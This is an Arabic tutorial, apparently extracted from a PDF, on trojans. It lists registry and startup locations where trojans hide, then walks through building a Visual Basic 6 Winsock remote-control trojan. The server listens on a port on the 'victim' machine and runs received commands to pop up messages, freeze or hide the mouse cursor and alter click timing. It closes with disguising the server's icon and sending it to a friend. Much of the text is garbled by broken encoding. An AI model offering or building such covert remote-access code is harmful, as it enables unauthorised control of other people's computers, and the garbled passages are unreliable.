عالم التروجانات و كل شيء عنه

e عامل الرتوجانات و كل شيء عنه Basheer Abduh faree Mohammed 3311

انح ذ هلل رب انعان, انقائم ف يحكى انت ش م ) عه ك يا نى تك تعهى, كا فضم هللا عه ك عظ ا (, انصالج انسالو عه س ذ ا يح ذ س ذ انعه اء س ذ األ ن ا خز رس ل رب انعان, عه آن صحث أج ع. ف جذ خطأ ف ي يا كا ف ي ص اب ف ت ف ق هللا. 3

ا سال ػ ١ ى س جذأ ػب ا زش خب بد و ش ء ػ ثششذ ض ع ط ٠ ٠ زض األلسب ا زب ١ خ ا ز رأر ػ شى اسئ خ أخ ثخ: ب ا زش خب بد! أ ٠ رخزج ء ا زش خب بد داخ ظب ب ب سبئ ا س ب ٠ خ ب ب ا جبدئ ا ؼب خ ا ز ٠ ى خال ب ث بء ا زش خب بد ب االرظبالد ا بفز طشق فزس ب ف خ بص ا خظ و ١ ف رج رش خب ه ا خبص ث اسطخ غبد ا جش دخ ا خز فخ و ١ ف رجث زا ا زش خب إ أطذلبءن رم ثزشف ١ ش ب ب ا زش خب بد ا زش خب بد أ ثب ؼشث ١ خ أزظ خ طش اد ػجبسح ػ ثشا ح طغ ١ شح ٠ ز ثث ب إ ا خظ سظ ي ػ ؼ بد أ إلصػبخ ر ه ػ ذ ب ٠ ى زظ اال ثبال زش ذ, لذ رط سد ز ا زش خب بد إض ١ ف ب ظب ايLogger key ا ز ٠ ى ب خال ا سظ ي ػ و ضشثبد أصساس زخ ا فبر ١ ر ث ثث ب إ ػ ا ؼ ١ زش خب بد دائ با ظب ب ػ إ ب اسزمج ا ؼ بد ا مزس ٠ فز ب داخ خ بص ا خظ إ ب اسزمجبي ا ؼ بد ا مزس إػبدح ثث ب ٠ ط ج إ ١ ث ز ا طش ٠ مخ ػبدح ٠ ز ثث ا ى و ١ ض ا خبص ثب زذ أ ا جش ٠ ذ اال ىزش ث ا ذخ ي إ ١ ز ا ؼ ١ خ ػبدح ٠ ز وشف ب ث اسطخ ثشا ح ىبفسخ ا زش خب بد إال إرا ل ذ ثج بء زا ا زش زب ث فسه زا ب س م ثزؼ ف ا شاز ا مبد خ غ رؼ ا طش ٠ مخ األسبس ١ خ ضشة ثشا ح ىبفسخ ا زش خب بد ا ش سح زز ال رىزشف أ رالػت ز ه ب االزظ أ ثشا ح ىبفسخ ا زش خب بد ا غ ١ ش ش سح أل ا ش سح... 2 أ تختثئ انتز جا اخ.. تعتقذ انج ع تأ انتز جا اخ تتج يثاشزج إن ان سار انتان داخم انز جستز [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentversion\run] ذا أيز خاطئ ح ث ك أ تختثئ ذ انتز جا اخ ف أحذ ان ساراخ انتان ح: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentversion\runonce] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentversion\runservices] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur

rentversion\runservicesonce] [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entversion\run] [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entversion\runonce] ذ انع ا تى ت ف ذ ا عادج يع كم تشغ م نهج اس يالحظح قذ ال تجذ انثز ايج تص غح exe إ ا ك يتث عا تانزي انتان 3%."*% عه ك انثحث أ ضا ع يهفاخ أخز داخم ذ ان ساراخ ي انز جستز [HKEY_CLASSES_ROOT\exefile\shell\open\command] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell \open\command] أ ك أ ضا أ تختثئ انتز جا اخ ف يجهذ تذء انتشغ م نه ص ل إن ذا ان هف عه ك انذ اب إن انذ اب إن قائ ح اتذأ ثى تزايج ثى تذء انتشغ م ثى انضغظ عه تانشر األ اخت ار األيز فتح ثى انتحقق ي كم يجهذ أ يهف داخم انذن م انساتق أل كم ان هفاخ ان جهذاخ ان ج دج داخم ذا ان هف تى تشغ ه ا تشكم تهقائ ع ذ تذء تشغ م انج اس.. ك أ ضا أ تختثئ انتز جا اخ داخم ان هف Win.ini عه ك انثحث داخم ذا ان هف ع ت اتع يثم run أ load فإ جذخ أ أسى + يسار انثز ايج غز ثا عه ك فأغهة انظ أ تز جا ك أ ضا أ تختثئ انتز جا اخ داخم ان هف system.ini عه ك انثحث داخم ذا ان هف ع ت اتع يثمshell فإ جذخ أ أسى + يسار انثز ايج غز ثا عه ك فأغهة انظ أ تز جا نع أ ك أ ضا أ ك داخم ان هف autoexec.bat قى تتحز ز ذا ان هف قى تانثحث ع ان هفاخ انغز ثح انت ت ت تايتذاداخ يثم.exe,.scr,.pif,.com,.bat أ داخم ان هف _ config.sys أح ا ا ك أ هجأ يثزيج انتز جا اخ إن استخذاو تق ح األس اء ان تشات فكه ا عزف ان هف command.comقذ هجأ ان ثزيج إن ضع يهف ن أسىcommand.exe تح ث ال الحع ي ثحث ع ان هف ان ذف ج د تغ ز أ ك حت أ تجذ يهف ن االسى فس يع االيتذاد فس نك ف يجهذ آخز.. نحم ذ ان شكهح ك ك استخذاو Windows Task Manager نتذق ق يهفاخ ان ذ س االساس ح. ب سبئ ا س ب ٠ خ ا زش خب بد!! سبئ ا س ب ٠ خ ب وث ١ شح زؼذدح و ب ٠ مبي ا لب ٠ خ خ ١ ش ا ؼالج أل ا فبد ا ز ر زظك ث ب ا زش خب بد ال ر خذ إال ف ا الغ ا غ ١ ش سس ١ خ و الغ ا ىشاوبد ا الغ االثبز ١ خ أ ا ز ٠ ز ثث ب إ ا جش ٠ ذ اال ىزش أ ػجش ثشا ح ا سبدثخ.. زا زب ي لذس اإل ىب االثزؼبد ػ ث ز ا بطك... و ب ر خذ ا ؼذ ٠ ذ ا جشا ح ث اي pc cilin اي zone Alarm اي trojan... Remover زخظظخ ثبصا خ ث ز ا فبد خ بصن.. و ب ٠ ى ه ثطش ٠ مخ manual ززف زا ا ف ثؼذ ا جسث ػ ثب طشق ا سبثمخ ا ز روش ب ب. 1 ب االرظبالد ا بفز طشق فزس ب ف خ بص ا خظ ػ طشق ا سظ ي ػ اي. IP ا جذأ ا ؼب الرظبي: ف ا سظخ ا ز رم ث ب ثؼ ارظبي رم ثجث ػذح أش ١ بء وب زب : اس ا سزخذ,ربس ٠ خ لذ االرظبي,ا جش وس, فز االرظبي, ػ ا ا لغ ا جش وس ٠ م ب ثذ س ث اثخ ث ١ ه ث ١ IP ا لغ ا ز رم ثبالرظبي ؼ.. ا بفذ :إرا فشضب ثال أ و خ بص زظ ثب ؼب ػجبسح ػ ضي ف ب ا طش ٠ مخ ا ز ٠ ى ب ا ذخ ي إ زا ا ضي ب ا فزبذ أ ا فز

ا ز خال ٠ ى ب ا ذخ ي إ أ خ بص د شبو رزوش خبطخ ل ب ثزسى ١ ش خبط ١ خ ػ ثشا ح ىبفسخ ا زش خب بد... و ١ ف ٠ ز فزر ز ا بفز ػ ذ ا خض!! ث اسطخ ا زش خب طجؼب ا ز س م ثجش دز لش ٠ جب خذا س سب ي أ ٠ ضب ثش دخ رش خب بفغ ١ سزط ١ غ ا شخض أ ٠ زظ ثب ظ د ا ظ سح إ أ ىب د اسزخذا ا جش وس أط اال. ب ا جبدئ ا ؼب خ ا ز ٠ ى خال ب ث بء ا زش خب بد ػ ١ ه لج ا زفى ١ ش ثج بء أزذ ا زش خب بد ؼشفخ أزذ األ س ا خ ا زب ١ خ: 1- ؼشفخ خ ١ ذح ثب ش ٠ دسزش 2- ؼشفخ إزذ غبد ا جش دخ ١ س ا ضش س ب أ رى غخ ؼمذح. 3- ؼشفخ خ ١ ذح ثز اثغ اي API ا ز خال ب سزط ١ غ ا زسى ثب ظب ثشى وب. 4- ؼشفخ سبئ ثث زا ا زش خب طشق ا ز ٠ رشف ١ ش. الر جستري: ػجبسح ػ لبػذح ث ١ ب بد ٠ ز خال ب زفظ ا م ١ ا ز ٠ ز اسزذػبء ب سظ ١ ب أث بء رشغ ١ ثؼض ا جشا ح.. غبد ا جش دخ: س م ثجش دخ زا ا زش خب ثؼ هللا ثبسزخذا غخ ثش دخ س خ ف خ ث غخ ا ف ١ د اي ث ١ سه, ثبإلضبفخ إ اسزخذا ثؼض ػ بطش اي ocxا ز ٠ ى ب خال ب االرظبي ثشجىخ اال زش ذ ثث ا ؼ بد إ ا د بص ا ٢ خش ر اثغ اي: API ثبسزخذا ز ا ز اثغ سزط ١ غ ا زسى ثد بص ا خض ثشى وب ز ا ز اثغ خ دح ثى غبد ا جش دخ ثذ اا ا ف ١ د اي ث ١ سه إ ا ف ١ د اي س ++ إ إ... سزط ١ غ أ ٠ ضبا خالي ز ا ز اثغ االرظبي ثب ش ٠ دسزش أ رغ ١ ش ل ١ ب سبئ ثث ا زش خب : رز ػبدح ثث ا زش خب بد ػجش ا جش ٠ ذ اال ىزش أ ا بس دش ز ه س زؼ أ ٠ ضب و ١ ف م ثجث ا جش ٠ ذ اال ىزش + رغ ١ ش ػ ا ا ز اسس ف ثال م ثجث ا شسب خ ػ أ ب سسب خ لغ ش س ث ىز ة م ثزس ١ ا زش خب داخ ب. 3 ث بء ا زش خب : لج و ش ء ػ ١ ب أ زفك ػ األ س ا زب ١ خ: 1 -ػذ اسزخذا زا ا زش خب ػ أ س أخز ا ض ع ػ أ ػ ف سج ١ ا ؼ فمظ. 2 - ب ذ خط سح زا ا زش خب أ ب األ س ا ز س جش د ب زمغ ػ ا خظ لذ خظذ ز األش ١ بء ثبأل س ا زب ١ خ زس س خ زست ا خط سح ب: 1- اسسبي سسبئ ضػدخ إ ا خظ د أ ٠ ذس 2- إخفبء أ رالػت ث ؤشش ا فأسح 3- ا زالػت ثبسرؼبش ا شبشخ ثؼض االش ١ بء 4- ا زالػت أ رشغ ١ ثشا ح أ إغالق ثشا ح 5- لشاءح أ ززف ا جش ٠ ذ اال ىزش 6- رخش ٠ ت فبد ا ظب االسبس ١ خ 7- رخش ٠ ت ا بسد ٠ ش

س تحذث ع اه ActiveXاىت س ق باستخذا ا ىشبظ األج ضة ع بعض ا اه 6 Microsoft Winsock Control طش قت استذعاء زا اىع صش ض اىف ج اه ب سل تت باىطش قت اىتاى ت: أ ال: إر ب إىى اه Toolاى ج دة Bar ف ساس اىشاشت ح إضغظ باىضس األ ىيفأسة ستظ ش ىل قائ ت سذىت ق باخت اس components - 2 ستظ ش ىل ا قائ ت ق ب ضع إشاسة صح (check) عيى اىع صش Microsoft Winsock Control 6 ح إضغظ عيى صس OK ستالحظ بأ اك أداة صغ ش ى ا شنو ج اصي م ب تش تصي ببعض ا قذ صادث ع ذك. ق بع و ضغطت تتاى عي ا حتى ت ضع ا عيى اىف س اىخاصت بل 3... حا ا : ا ق بإضافت صس command1 بح ج ن = captionف ت ابع زا اىع صش ح ق بنتابت اىن د اىتاى )داخو اىضس( اىزي خالى س عشف بعض خصائص اىشبنت ع ذ ا: " MsgBoxرقم اآلي بي الخاص بالجهاز & " Winsock1.LocalIP " MsgBoxاسم الهوست & " Winsock1.LocalHostName " MsgBoxرقم المنفذ الخاص بجهازك & " Winsock1.LocalPort اآلن هاكم التوابع الت سنستخدمها بعمل االتصال مع شرح كل واحدة منها: 5 ثالثا : حالة االتصال: Winsock1.Connect البرامترات التابعة 1 -رقم اآلي ب بالجهاز الخصم 2 -رقم المنفذ الذي تقوم بالتجسس عل ه و لتطب قة بالطر قة التال ة : [code]

Winsock1.Connect(ip,Port) [\code] حالة الحصول على ب انات ( إستالم ب انات من الكل نت) Winsock1.GetData البرامترات التابعة: 1 -الب انات القادمة 2 -نوعها 3 -طول نبضة البث و لتطب قة بالطر قة التال ة: [code] Winsock1.GetData(data,type,maxlen) [\code] حالة االستماع إلى المنفذ الذي قمنا بفتحه ف جهاز الخصم: Winsock1.Listen -ال وجد لها بارمترات تابعة فتح منفذ ( port )ف جهاز الخصم Winsock1.LocalPort بارامترات التابعة ه تحد د رقم هذا المنفذ على سب ل المثال نر د أن نفتح المنفذ 2121 فنكتب بهذه الحالة الكود التال : [code] Winsock1.LocalPort=1232 [\code] تحد د نو البرتوكول المستخدم ف االتصال: Winsock1.Protocol البرامترات الملحقة ه تحد د نوع البرتوكول أي إما TCP أوUDP و لكتابة هذا الكود نض ف إشارة ساوي بعد Winsock1.Protocol ف ظهر لنا خ اران على الشاشة نختار ما ناسبنا منها و نحن هنا نقوم باخت ارsckTCPProtocol 6 حالة إرسال الب انات: Winsock1.SendData البرامترات الملحقة ه فقط هنا الب نات وه من النمطstring أي لكتابة الكود الذي سنقوم به ببث تعل مة أسمها مث اال lala نكتب [code] Winsock1.SendData"lala" [\code] آل ة العمل ال ة العمل أخ العز ز بس طة و غ ر معقدة كما تصور البعض ح ث نقوم اوال بفتح منفذ عند الخضم بواسطة ملف ال serverثم نقوم بتحد د برتروكول االتصال ثم نقوم بعمل إتصال بواسطة رقم اآلب + رقم المنفذ المفتوح عند الخصم ثم نقوم ببث الب انات الت نر دها إلى جهاز الخصم الذي قوم بدوره باستقبال

هذه الب انات و تنف ذ المطلوب عمله ف جهاز الخصم من خالل الب انات المرسلة تطب ق المشروع + شروح عمل ة كاملة... س بذأ بإسساه سسائو إىى اى ستخذ ا ال مي ا عشف بأ اىتش جا عباسة ع يف األ ه ع ذك اىخا ع ذ اىخص س بذأ ا بتشن و اى يف اىزي س بقى ع ذك اهcelint فتح شش عا جذ ذا ض ف text 2 أصساس غ ش ع ا ز األصساس ىتصبح ماىتاى : = name=command1:captionاتصاه = name=command2:captionقطع اتصاه = name=command3:captionاسسو سساىت ا داخو اىضس األ ه ق بنتابت اىن د اىتاى : lebel احذ حالث Command1.Enabled = False " = Label1.Captionجاري االتصال" Winsock1.Connect Text1.Text, 1234 ششز : ا سطش األ ي إل غبء رفؼ ١ ا ضس األ ي زز ال رم ا زظ ثط ت إرظبي آخش لذ االرظبي ا سطش ا ثب زغ ١ ش ػ ا ط ذ ق ا ؼ ا ٠ إ خبس االرظبي ا سطش ا ثب ث إلرظبي غ Ip ؼ ١ ىزج داخ اي text1 سل ا فز ا فز ذ ػ ذ ا خظ ا ز س م ثفزس ػ ذ ١ ى ا فز سل 1234 ا ٢ داخ ا ضس ا ثب ىزت ا ى د ا زب : 7

Command1.Enabled = True " = Label1.Captionتم قطع االتصال" Winsock1.Close ششز : ا سطش األ ي إلػبدح رفؼ ١ ا ضس األ ي أ صس االرظبي ا سطش ا ثب زغ ١ ش ط ذ ق ا ؼ ب ٠ إ ( ر لطغ االرظبي( ا سطش ا ثب ث إلغالق اإلرظبي غ ا د بص ا خظ ا ٢ داخ ا ضس ا ثب ث ىزت ا ى د ا زب : Winsock1.SendData "msg" & Text2.Text شرحه: قوم السطر السابق بارسال ب ان كتاب هو msg و الذي سنرمزه ف جهاز الخصم على أنه رسالة ثم & الكالم المكتوب داخل الصندوق text2 ل تم ارسال رسالة بما بداخلها اآلن نقوم بالضغط على ال winsockو الت تعلمنا إضافتها ف الدرس السابق ثم نقكتب داخل الحدث connect الكود التال : " = Label1.Captionتم عمل ة االتصال بالجهاز اآلخر" 8 شرحه: السطر السابق حدث عندما تم االتصال مع الجهاز الخصم و عندها تم تغ ر

صندوق العناو ن lلى abelcaption ( تم عمل ة االتصال بالجهاز اآلخر( نرتب األزار لتصبح موافقة للصورة المرفقة ا تقو إىى اىس شفش اىت س ق باسساى ا إىى ج اص اىخص نقوم بفتح مشروع جد د اآلن نقوم كالعادة بإضافة أداة اإلتصالwinsock ثم نكتب داخل الفورم load الكود التال : Winsock1.LocalPort = 1234 Winsock1.Listen شرحه: قوم السطر األول بفتح منفذ ف جهاز الخصم و هو هنا 1234 أما السطر الثان فهو لبدء أخذ معلومات كن هذا المنفذ اآلن داخل ال winsockضمن الحدث ConnectionRequest نقوم بكتابة الكود التال : Winsock1.Close Winsock1.Accept requestid 9 شرحه: السطر األول إلغالق االتصال و الثان لقبول الب انات القادمة من الكل نت اآلن داخل الحدث DataArrival نكتب الكود التال :

Dim vardata As String Dim strdata As String Dim cmddata As String * 3 Winsock1.GetData strdata cmddata = Left(strdata, 3) vardata = Right(strdata, Len(strdata) - 3) DoCommand cmddata, vardata السطر السابق تضمن تعار ف للب انات القادمة و السطر األخ ر هو للتابع الذي سنض فه إلى الmodule اآلن عند الحدث Error أي حدث حدوث خطأ باالتصال نكتب الكود التال : Winsock1.Close Winsock1.Listen 31 شرحه: السطر األول إلغالق االتصال السطر الثان إلعادة أخذ الب انات القادمة من الكل نت -اآلن نقوم بإضافة module من قائمة project ثم نقوم بإنشاء تابع على الشكل التال :

Public Function DoCommand(command As String, data As String) ثم نقوم بإنشاء حاالت عن الب انات القادمة بإضافة الكود التال : ( سنض ف ما نر د ف ما بعد( و ذلك Select Case LCase(command) نض ف اآلن حالة وصول الب ان الذي حمل البتتات msg و الت سنعرفها هنا على أنهاmsgbox و نكتب الكود التال : Case "msg" MsgBox data, vbinformation, "Information" السطر األول نوع الحالة السطر الثان قوم بإظهار صندوق رسالة إلى المستخدم حوي على الب انات المكتوبة ضمن ال text2 ف الكل نت ثم نض ف الكود التال ألنهاء الحاالت 33

End Select و ننه هذا التابع كالعادة بالتعل مة End Function -بهذا أصبح كل ش ء جاهز اا عل ك اآلن ارسال هذه الملف لصد قك و التجر ب عل ه الخطوات الت اتفقنا عل ها نفتح المشروع السابق لنض ف له خ ارات جد دة و ه الت تتعلق بمؤشر الفأرة و سنتسخدم ف هذا الدرس التوابع الجد دة التال ة: SetCursorPos: مكننا من خاللها تغ ر و تحد د مكان جد د لمؤشر الفأرة عند جهاز الخصم SetDoubleClickTime: مكننا من خالل هذا التابع إنقاص الفترة الزمن ة للضغط على المؤشر بح ث ال تمكن المستخدم من عمل ضغتط ن متتال ت ن على الفأرة ShowCursor: ألظهار وإخفاء مؤشر الفأرة نقوم ف المشروع السابق) الكل ت( بإضافة ثالث أزار جد دة لتأخذ الترت ب من 3 إلى 7 و قم بتغ ر عناو نها للتال : = name=command4:captionجمد مؤشر الفأرة = name=command5:captionزد سرعة ضربات الفأرة = name=command6:captionقم بإخفاء مؤشر الفأرة = name=command7:captionقم بإظهار مؤشر الفأرة نقوم اآلن بارسال رموز نمط string إلى جهاز الخصم ثم نقوم ف الملف الثان بترجمة هذه الرموز نكتب داخل الزر الرابع الكود التال : 32 Private Sub Command4_Click()

Winsock1.SendData "frz" End Sub و الخامس: Private Sub Command5_Click() Winsock1.SendData "sss" End Sub و السادس: Private Sub Command6_Click() Winsock1.SendData "hid" End Sub و السابع: 31 Private Sub Command7_Click()

Winsock1.SendData "sho" End Sub و لقد انته نا اآلن من ملف الك نت ننتقل اآلن إلى ملف الس رفر ف جهاز الخصم و نقوم بفتح المشروع السابق و نض ف عل ه التوابع الت قمنا بشرحها سابقاا )من قائمة add-ins ثم( Viewer api ثم نقوم بالدخول إلى ال moduleالخاصة بنا و نضع تصار ح التوابع ف قسم التصر حات العامة: أي: Public Declare Function SetCursorPos Lib "user32" Alias "SetCursorPos" (ByVal x As Long, ByVal y As Long) As Long Public Declare Function SetDoubleClickTime Lib "user32" Alias "SetDoubleClickTime" (ByVal wcount As Long) As Long Public Declare Function ShowCursor Lib "user32" Alias "ShowCursor" (ByVal bshow As Long) As Long ثم نعرف ثالث متحوالت نمط srting تعبر عن التابع على النحو التال : Dim setcursor As String 33 Dim clicktime As String Dim show As String

ثم نقوم بإضافة حاالت الب انات المرمزة القادمة: Case "frz" setcursor = SetCursorPos(50, 50) Case "sss" clicktime = SetDoubleClickTime(50) Case "hid" show = ShowCursor(0) Case "sho" show = ShowCursor(1) كخطوة نهائ ة نقوم بإخفاء الفورم و تغ ر ال iconإلى شكل صورة ما مالحظة مكنك أن تجرب إقتحام نفسك فتح الملف الس رفر او اال ثم ضع اآلي ب 2 217272722 تى تح ذ هللا اال ت اء ي كتاتح ذ ان تح إ شاء هللا خان ح ي األخطاء جم ي ال س زج ي كى انذعاء ن ا ف ظ ز انغ ة هلل ان ثتغ ي راء انقصذ. 35

ارجو منكم الدعاء لي... Basheer2010.55@gmail.com Alfaree1988@yahoo.com 36